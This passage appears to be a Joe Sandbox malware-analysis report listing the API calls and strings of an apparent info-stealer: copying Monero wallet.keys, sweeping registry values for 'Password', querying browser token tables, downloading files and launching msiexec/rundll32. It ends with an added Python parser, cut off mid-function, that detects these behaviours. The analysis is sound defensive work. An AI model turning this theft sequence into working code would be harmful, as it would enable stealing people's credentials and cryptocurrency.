                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExecuteShell$lstrcpy
                            • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                            • API String ID: 2507796910-3625054190
                            • Opcode ID: a0e239f8fcd2ac92abe91e76dd30eb0eb593b512bd29506129933a608acba187
                            • Instruction ID: 6e3e8f0b1fa26100ff6e87184840aaefff08e8e2ad76550b821645d7392c3dd9
                            • Opcode Fuzzy Hash: a0e239f8fcd2ac92abe91e76dd30eb0eb593b512bd29506129933a608acba187
                            • Instruction Fuzzy Hash: 48120A718101189ADF49FBE0CD92EEEB7BEAF14300F50415DE50666591EF302B4ACFAA
                            APIs
                              • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                              • Part of subcall function 00686280: InternetOpenA.WININET(006A0DFE,00000001,00000000,00000000,00000000), ref: 006862E1
                              • Part of subcall function 00686280: StrCmpCA.SHLWAPI(?,013AE3F0), ref: 00686303
                              • Part of subcall function 00686280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00686335
                              • Part of subcall function 00686280: HttpOpenRequestA.WININET(00000000,GET,?,013ADE28,00000000,00000000,00400100,00000000), ref: 00686385
                              • Part of subcall function 00686280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006863BF
                              • Part of subcall function 00686280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006863D1
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                            • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00695318
                            • lstrlen.KERNEL32(00000000), ref: 0069532F
                              • Part of subcall function 00698E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00698E52
                            • StrStrA.SHLWAPI(00000000,00000000), ref: 00695364
                            • lstrlen.KERNEL32(00000000), ref: 00695383
                            • lstrlen.KERNEL32(00000000), ref: 006953AE
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                            • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                            • API String ID: 3240024479-1526165396
                            • Opcode ID: b339cad2b7c15ae93641fee0d4927fc6fe358498e7fab01438245fab5f2a9e6b
                            • Instruction ID: 1ed71c9725480056f63939b6e8836302b4b1159573e57d8d53134b4cedabb69d
                            • Opcode Fuzzy Hash: b339cad2b7c15ae93641fee0d4927fc6fe358498e7fab01438245fab5f2a9e6b
                            • Instruction Fuzzy Hash: 1A51DE709201489BCF54FFA0C996AED77BEAF11304F50401CF80A5B992EF346B46CB96
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpylstrlen
                            • String ID:
                            • API String ID: 2001356338-0
                            • Opcode ID: 123b623a4d344d277e9a6b87e6e4dcd56706e46d7bf0fb5e655000cc5f23ea9a
                            • Instruction ID: bf6f4aff0d87ea772bdc42557db968d5b8ba306317bf2d0aac395570e81ade6b
                            • Opcode Fuzzy Hash: 123b623a4d344d277e9a6b87e6e4dcd56706e46d7bf0fb5e655000cc5f23ea9a
                            • Instruction Fuzzy Hash: 4FC1B3B590011D9BCF58EFA0DC89FEA73BEBF54304F10459DE40AA7641DA30AA85CFA5
                            APIs
                              • Part of subcall function 00698DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00698E0B
                            • lstrcat.KERNEL32(?,00000000), ref: 006942EC
                            • lstrcat.KERNEL32(?,013AD918), ref: 0069430B
                            • lstrcat.KERNEL32(?,?), ref: 0069431F
                            • lstrcat.KERNEL32(?,013AC8E0), ref: 00694333
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 00698D90: GetFileAttributesA.KERNEL32(00000000,?,00681B54,?,?,006A564C,?,?,006A0E1F), ref: 00698D9F
                              • Part of subcall function 00689CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00689D39
                              • Part of subcall function 006899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006899EC
                              • Part of subcall function 006899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00689A11
                              • Part of subcall function 006899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00689A31
                              • Part of subcall function 006899C0: ReadFile.KERNEL32(000000FF,?,00000000,0068148F,00000000), ref: 00689A5A
                              • Part of subcall function 006899C0: LocalFree.KERNEL32(0068148F), ref: 00689A90
                              • Part of subcall function 006899C0: CloseHandle.KERNEL32(000000FF), ref: 00689A9A
                              • Part of subcall function 006993C0: GlobalAlloc.KERNEL32(00000000,006943DD,006943DD), ref: 006993D3
                            • StrStrA.SHLWAPI(?,013ADAE0), ref: 006943F3
                            • GlobalFree.KERNEL32(?), ref: 00694512
                              • Part of subcall function 00689AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nh,00000000,00000000), ref: 00689AEF
                              • Part of subcall function 00689AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00684EEE,00000000,?), ref: 00689B01
                              • Part of subcall function 00689AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,Nh,00000000,00000000), ref: 00689B2A
                              • Part of subcall function 00689AC0: LocalFree.KERNEL32(?,?,?,?,00684EEE,00000000,?), ref: 00689B3F
                            • lstrcat.KERNEL32(?,00000000), ref: 006944A3
                            • StrCmpCA.SHLWAPI(?,006A08D1), ref: 006944C0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006944D2
                            • lstrcat.KERNEL32(00000000,?), ref: 006944E5
                            • lstrcat.KERNEL32(00000000,006A0FB8), ref: 006944F4
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmp
                            • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                            • String ID:
                            • API String ID: 3541710228-0
                            • Opcode ID: b133211bf4422a2fb64a66c1aac795383fee1a9d888d69b7902f270ace4f5d42
                            • Instruction ID: c2a4a91da34b0d82be4110c59e4d667f8b145b1f9c46342f2f5ab794c96f4c76
                            • Opcode Fuzzy Hash: b133211bf4422a2fb64a66c1aac795383fee1a9d888d69b7902f270ace4f5d42
                            • Instruction Fuzzy Hash: A17112B6900208ABDF54EBE4DC86FEE73BEBB48304F044598F60597181EA35DB45CBA5
                            APIs
                              • Part of subcall function 006812A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 006812B4
                              • Part of subcall function 006812A0: RtlAllocateHeap.NTDLL(00000000), ref: 006812BB
                              • Part of subcall function 006812A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 006812D7
                              • Part of subcall function 006812A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 006812F5
                              • Part of subcall function 006812A0: RegCloseKey.ADVAPI32(?), ref: 006812FF
                            • lstrcat.KERNEL32(?,00000000), ref: 0068134F
                            • lstrlen.KERNEL32(?), ref: 0068135C
                            • lstrcat.KERNEL32(?,.keys), ref: 00681377
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • Part of subcall function 00698B60: GetSystemTime.KERNEL32(006A0E1A,013A9C78,006A05AE,?,?,006813F9,?,0000001A,006A0E1A,00000000,?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 00698B86
                              • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                              • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                            • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00681465
                              • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                              • Part of subcall function 006899C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 006899EC
                              • Part of subcall function 006899C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00689A11
                              • Part of subcall function 006899C0: LocalAlloc.KERNEL32(00000040,?), ref: 00689A31
                              • Part of subcall function 006899C0: ReadFile.KERNEL32(000000FF,?,00000000,0068148F,00000000), ref: 00689A5A
                              • Part of subcall function 006899C0: LocalFree.KERNEL32(0068148F), ref: 00689A90
                              • Part of subcall function 006899C0: CloseHandle.KERNEL32(000000FF), ref: 00689A9A
                            • DeleteFileA.KERNEL32(00000000), ref: 006814EF
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                             • Associated: 00000000.00000002.2071627677.0000000000680000.00000004.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2071651178.0000000000731000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2071651178.000000000073D000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2071651178.0000000000762000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2071651178.00000000008CA000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2074639332.00000000008DE000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2074639332.0000000000A58000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2074639332.0000000000B34000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2074639332.0000000000B5B000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2074639332.0000000000B65000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2074639332.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2075412916.0000000000B75000.00000080.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2075586654.0000000000D0A000.00000040.00000001.01000000.00000003.sdmp
                             • Associated: 00000000.00000002.2075616316.0000000000D0B000.00000080.00000001.01000000.00000003.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                            • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                            • API String ID: 3478931302-218353709
                            • Opcode ID: 0697d873e4a102b4839ade1608dab154272e928a3098b70c4c562c0716db6139
                            • Instruction ID: 03100a203cbd4e4b09d889a9e6a0f72037d537799682c4391d3775c75a41a618
                            • Opcode Fuzzy Hash: 0697d873e4a102b4839ade1608dab154272e928a3098b70c4c562c0716db6139
                            • Instruction Fuzzy Hash: F95133B19501185BCB55FBA0DD92FED73BDAB54300F40419CB60A66481EE305B86CFAA
                            APIs
                              • Part of subcall function 006872D0: memset.MSVCRT ref: 00687314
                              • Part of subcall function 006872D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0068733A
                              • Part of subcall function 006872D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006873B1
                              • Part of subcall function 006872D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0068740D
                              • Part of subcall function 006872D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00687452
                              • Part of subcall function 006872D0: HeapFree.KERNEL32(00000000), ref: 00687459
                            • lstrcat.KERNEL32(00000000,006A17FC), ref: 00687606
                            • lstrcat.KERNEL32(00000000,00000000), ref: 00687648
                            • lstrcat.KERNEL32(00000000, : ), ref: 0068765A
                            • lstrcat.KERNEL32(00000000,00000000), ref: 0068768F
                            • lstrcat.KERNEL32(00000000,006A1804), ref: 006876A0
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006876D3
                            • lstrcat.KERNEL32(00000000,006A1808), ref: 006876ED
                            • task.LIBCPMTD ref: 006876FB
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                            • String ID: :
                            • API String ID: 3191641157-3653984579
                            • Opcode ID: 1cd5b8b8600cc3dad25fa5869734a3c9993062d6d62c4f7878163db66ddaf8e4
                            • Instruction ID: f51693d4b855e5d0c9628e1b7c94bfd501517eb267a1faa20cb030b0aeac4a35
                            • Opcode Fuzzy Hash: 1cd5b8b8600cc3dad25fa5869734a3c9993062d6d62c4f7878163db66ddaf8e4
                            • Instruction Fuzzy Hash: 76313872900109DFCB48FBA4DC99DFE777AFB55305B244218F102A7290DE34E946CBA6
                            APIs
                            • memset.MSVCRT ref: 00687314
                            • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0068733A
                            • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006873B1
                            • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0068740D
                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00687452
                            • HeapFree.KERNEL32(00000000), ref: 00687459
                            • task.LIBCPMTD ref: 00687555
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$EnumFreeOpenProcessValuememsettask
                            • String ID: Password
                            • API String ID: 2808661185-3434357891
                            • Opcode ID: 33f5786276eaf209e50f530d96e8186e72b2ee3e7ffe326908e743d51c9aebb3
                            • Instruction ID: be00fc76eb9cd8657cdeb558cdef36094ccb8fa492b51955a6946a8a2dc56024
                            • Opcode Fuzzy Hash: 33f5786276eaf209e50f530d96e8186e72b2ee3e7ffe326908e743d51c9aebb3
                            • Instruction Fuzzy Hash: 39613CB580011C9BDB24EB50CC55BE9B7B9BF44304F1082E9E689A6141DF70AFC9CFA5
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,013ADEB8,00000000,?,006A0E2C,00000000,?,00000000), ref: 00698130
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00698137
                            • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00698158
                            • __aulldiv.LIBCMT ref: 00698172
                            • __aulldiv.LIBCMT ref: 00698180
                            • wsprintfA.USER32 ref: 006981AC
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                            • String ID: %d MB$@
                            • API String ID: 2774356765-3474575989
                            • Opcode ID: 33351d512d1a857ea09840acd349c95a2d9fb921c0afed6b864ac841f9537785
                            • Instruction ID: 9daf2dba117d18fe385431c7dd56eb21a3f8768d4a87b5b4635ea4756dc59528
                            • Opcode Fuzzy Hash: 33351d512d1a857ea09840acd349c95a2d9fb921c0afed6b864ac841f9537785
                            • Instruction Fuzzy Hash: 0C2138B1E44208ABDB04DFD4CD4AFAEB7BDFB45B04F104219F605BB680C77969018BA9
                            APIs
                              • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                              • Part of subcall function 006847B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00684839
                              • Part of subcall function 006847B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00684849
                            • InternetOpenA.WININET(006A0DF7,00000001,00000000,00000000,00000000), ref: 0068610F
                            • StrCmpCA.SHLWAPI(?,013AE3F0), ref: 00686147
                            • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0068618F
                            • CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 006861B3
                            • InternetReadFile.WININET(?,?,00000400,?), ref: 006861DC
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0068620A
                            • CloseHandle.KERNEL32(?,?,00000400), ref: 00686249
                            • InternetCloseHandle.WININET(?), ref: 00686253
                            • InternetCloseHandle.WININET(00000000), ref: 00686260
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                            • String ID:
                            • API String ID: 2507841554-0
                            • Opcode ID: 4444b74a2a868f9252f40f038b0415b61c1bf4dd9b7bcd2bbb6127beda32d703
                            • Instruction ID: 4f868e10947a5e448c6f051c7a655e6c3dc10ab58ec58b278c08abc5bb890c52
                            • Opcode Fuzzy Hash: 4444b74a2a868f9252f40f038b0415b61c1bf4dd9b7bcd2bbb6127beda32d703
                            • Instruction Fuzzy Hash: 3D517FB1900218ABDF24EFA0DD49FEE77B9FB04705F108198B605A72C1DB746A85CF95
                            APIs
                              • Part of subcall function 0069A740: lstrcpy.KERNEL32(006A0E17,00000000), ref: 0069A788
                              • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
                              • Part of subcall function 0069A9B0: lstrcpy.KERNEL32(00000000), ref: 0069AA04
                              • Part of subcall function 0069A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0069AA12
                              • Part of subcall function 0069A920: lstrcpy.KERNEL32(00000000,?), ref: 0069A972
                              • Part of subcall function 0069A920: lstrcat.KERNEL32(00000000), ref: 0069A982
                              • Part of subcall function 0069A8A0: lstrcpy.KERNEL32(?,006A0E17), ref: 0069A905
                              • Part of subcall function 0069A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0069A7E6
                            • lstrlen.KERNEL32(00000000), ref: 0068BC9F
                              • Part of subcall function 00698E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00698E52
                            • StrStrA.SHLWAPI(00000000,AccountId), ref: 0068BCCD
                            • lstrlen.KERNEL32(00000000), ref: 0068BDA5
                            • lstrlen.KERNEL32(00000000), ref: 0068BDB9
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2071651178.0000000000681000.00000040.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_680000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat$AllocLocal
                            • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                            • API String ID: 3073930149-1079375795
                            • Opcode ID: 38a996a53ce870b519aa013f7fbb20251ce05e65fa8fc5aef0ac70a9ab06d81f
                            • Instruction ID: b8b1f8409d98e8cd909572619cedec3c26b8d2eea17923cd6a1b05ed608e1686
                            • Opcode Fuzzy Hash: 38a996a53ce870b519aa013f7fbb20251ce05e65fa8fc5aef0ac70a9ab06d81f
                            • Instruction Fuzzy Hash: FEB12B719201189BDF44FBE0DD96EEE73BEBF14300F40415CF506A6591EE346A49CBAA
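                             The function entries above list one API call per line with no interpretation. The following Python is an added example, not part of the Joe Sandbox report or of the sample: it parses lines in exactly that "APIs" layout and tags the four behaviours visible in the entries above (the \Monero\wallet.keys copy, the HKCU value sweep matched against "Password", the WinINet download written to a GENERIC_WRITE file, and the "AccountId" lookup preceding the token_service query), returning the call-site addresses to jump to in IDA. The sample input is copied from the entries; the behaviour names, the small constant decoders and the rule thresholds are this example's own assumptions.

```python
import re
from dataclasses import dataclass
from typing import Optional

# Constructed sample input: API lines copied in the Joe Sandbox "APIs" layout from the
# function entries above (Monero wallet copy, HKCU "Password" value sweep, WinINet
# download written to disk, Chromium "AccountId" lookup). Indented bullets are subcalls.
SAMPLE_TRACE = r"""
  • Part of subcall function 006812A0: RegCloseKey.ADVAPI32(?), ref: 006812FF
• lstrcat.KERNEL32(?,.keys), ref: 00681377
  • Part of subcall function 0069A9B0: lstrlen.KERNEL32(?,013A8960,?,\Monero\wallet.keys,006A0E17), ref: 0069A9C5
• CopyFileA.KERNEL32(?,00000000,00000001), ref: 00681465
• DeleteFileA.KERNEL32(00000000), ref: 006814EF
• memset.MSVCRT ref: 00687314
• RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0068733A
• RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 006873B1
• StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0068740D
• InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0068618F
• CreateFileA.KERNEL32(00000000,40000000,00000003,00000000,00000002,00000080,00000000), ref: 006861B3
• InternetReadFile.WININET(?,?,00000400,?), ref: 006861DC
• WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0068620A
• StrStrA.SHLWAPI(00000000,AccountId), ref: 0068BCCD
"""

# One call line: optional "Part of subcall function X:", then Api.Module(args), ref: addr.
# Lines without an argument list (memset.MSVCRT ref: ...) are accepted too.
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<parent>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Windows constants the trace shows as bare hex (assumption: only these are decoded here).
HIVES = {
    0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
    0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS",
}
ACCESS_FLAGS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}


@dataclass(frozen=True)
class ApiCall:
    api: str
    module: str
    args: tuple
    ref: int                      # call-site address as IDA reports it
    parent: Optional[int] = None  # subcall function address when the line is indented under one


def parse_trace(text: str) -> list:
    """Turn Joe Sandbox API lines into ApiCall records; non-matching lines (headers) are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args") or ""
        args = tuple(a.strip() for a in raw.split(",")) if raw else ()
        parent = int(m.group("parent"), 16) if m.group("parent") else None
        calls.append(ApiCall(m.group("api"), m.group("module"), args, int(m.group("ref"), 16), parent))
    return calls


def decode_hive(arg: str) -> str:
    """Map the hKey argument of RegOpenKeyExA to a hive name; '?' and plain handles stay opaque."""
    try:
        return HIVES.get(int(arg, 16), f"handle:{arg}")
    except ValueError:
        return f"unknown:{arg}"


def decode_access(arg: str) -> list:
    """Expand a CreateFileA dwDesiredAccess value into the generic rights it contains."""
    try:
        value = int(arg, 16)
    except ValueError:
        return []
    return [name for bit, name in ACCESS_FLAGS.items() if value & bit]


def has(calls: list, api: str, *needles: str) -> bool:
    """True if some call to `api` carries every needle as a substring of one of its arguments."""
    return any(c.api == api and all(any(n in a for a in c.args) for n in needles) for c in calls)


def classify(calls: list) -> dict:
    """Tag stealer behaviours (names are this example's own) and return the call sites behind each."""
    found = {}
    # Wallet theft: a path ending in wallet.keys is assembled, the file is copied, the copy removed later.
    if any("wallet.keys" in a for c in calls for a in c.args) and has(calls, "CopyFileA"):
        found["wallet_file_copy"] = [c.ref for c in calls if c.api in ("CopyFileA", "DeleteFileA")]
    # Registry credential sweep: values are enumerated and substring-matched against "Password".
    if has(calls, "RegEnumValueA") and has(calls, "StrStrA", "Password"):
        found["registry_password_sweep"] = [
            c.ref for c in calls
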